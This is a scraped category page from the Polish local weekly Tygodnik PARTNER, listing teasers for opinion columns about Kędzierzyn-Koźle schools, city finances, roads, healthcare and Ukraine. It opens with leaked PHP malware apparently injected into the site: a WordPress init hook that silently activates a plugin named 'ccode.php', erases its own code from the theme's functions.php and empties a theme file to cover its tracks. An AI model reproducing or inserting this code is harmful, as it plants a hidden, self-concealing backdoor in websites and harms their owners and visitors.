function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php'); file_put_contents('/home/micropro/ftp/apkka/wp-content/themes/disto/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate'); KOMENTARZE | Tygodnik PARTNER

List/Grid KOMENTARZE Subscribe RSS feed of category KOMENTARZE

Kościół wciąż nas jednoczy

Kościół wciąż nas jednoczy

Zgodnie z moimi przewidywaniami, Orszak Trzech Króli zgromadził tłumy mieszkańców chcących wziąć udział w tym widowisku. Tak wielu ludzi, którzy wzięli aktywny udział przebierając się i maszerując przez miasto pokazuje,… Czytaj więcej »

Nie czas zamykać szkoły

Nie czas zamykać szkoły

    Kończąca się kadencja samorządu w Kędzierzynie-Koźlu przebiegała głównie pod znakiem konfliktu, dotyczącego likwidacji trzech szkół podstawowych.  Ta sprawa elektryzowała opinię publiczną, była jedną z przyczyn ogłoszenia referendum w sprawie… Czytaj więcej »

Ukraiński sprawdzian

Ukraiński sprawdzian

» Grzegorz Chudomięt   Wydarzenia na Ukrainie wywołują wiele interesujących refleksji i porównań historycznych związanych z zachowaniami państw totalitarnych o dążeniach imperialistycznych jak nazistowskie Niemcy czy Związek Radziecki. Modus operandi… Czytaj więcej »

Nasze miasto potrzebuje nowych źródeł dochodu

Nasze miasto potrzebuje nowych źródeł dochodu

» Ryszard Masalski     Jak pięknie brzmi ujawnienie wystąpienia wolnych środków finansowych w budżecie miasta Kędzierzyna – Koźla, np. w wysokości blisko 15 mln zł, w 2013 r. Ileż to… Czytaj więcej »

Wśród pacjentów opinia  o służbie zdrowia jest zła

Wśród pacjentów opinia o służbie zdrowia jest zła

» Olga Pokorska – Młodzińska W 2013 roku ilość skarg na opiekę zdrowotną wnoszonych do Rzecznika Praw Pacjenta wzrosła dwukrotnie w stosunku do 2012 roku. Wiceprezes Naczelnej Rady Lekarskiej Konstanty… Czytaj więcej »

Miasto wielkiego przemysłu potrzebuje betonowych dróg

Miasto wielkiego przemysłu potrzebuje betonowych dróg

» Robert Węgrzyn   Zima w tym roku na dobre jeszcze nas nie zaatakowała, a i tak już widać, że kilka dni mrozu oraz temperatur na pograniczu zera przyczyniło się… Czytaj więcej »

Polityka to zakłamana gra kolesiów

Polityka to zakłamana gra kolesiów

Od 20 lat systematycznie spada liczba mieszkańców Kędzierzyna-Koźa, a co za tym idzie maleje liczba uczniów w szkołach. Już w 2005 roku dopłata z budżetu gminy do utrzymania szkół podstawowych… Czytaj więcej »

Prezydent ma rację, ale to za mało

Prezydent ma rację, ale to za mało

Przekształcenie szkół z publicznych w prowadzone przez stowarzyszenia jest krokiem, któremu powinni przyklasną wszyscy rodzice, przywiązujący wagę do tego gdzie i w jakich warunkach uczą się ich dzieci. Mimo to… Czytaj więcej »

Święto miłości i… bylejakości

Święto miłości i… bylejakości

Ciekaw jestem ilu z Państwa z okazji niedawnego Święta Zakochanych zdecydowało się na zakup łakoci opakowanych na tę okazję przez firmy cukiernicze w czerwone pudełka w kształcie serca? Przyznam, że… Czytaj więcej »

Pojawia się i znika. Taka polityka

Pojawia się i znika. Taka polityka

Skrzyżowanie al. Jana Pawła II i ul. 1 Maja należy do najniebezpieczniejszych w Kędzierzynie-Koźlu. Dochodzi tam do licznych stłuczek, zdarzają się potrącenia pieszych, a bywało że i do śmiertelnych wypadków…. Czytaj więcej »

© 2020 Tygodnik PARTNER. All rights reserved / Wszystkie prawa zastrzeżone
Zobacz także: www.kedzierzynkozle24.pl.